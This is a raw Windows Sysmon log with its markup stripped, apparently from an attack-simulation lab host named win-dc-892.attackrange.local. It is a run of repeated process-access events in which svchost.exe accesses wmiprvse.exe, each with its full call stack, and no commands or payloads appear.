12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.957{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.941{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 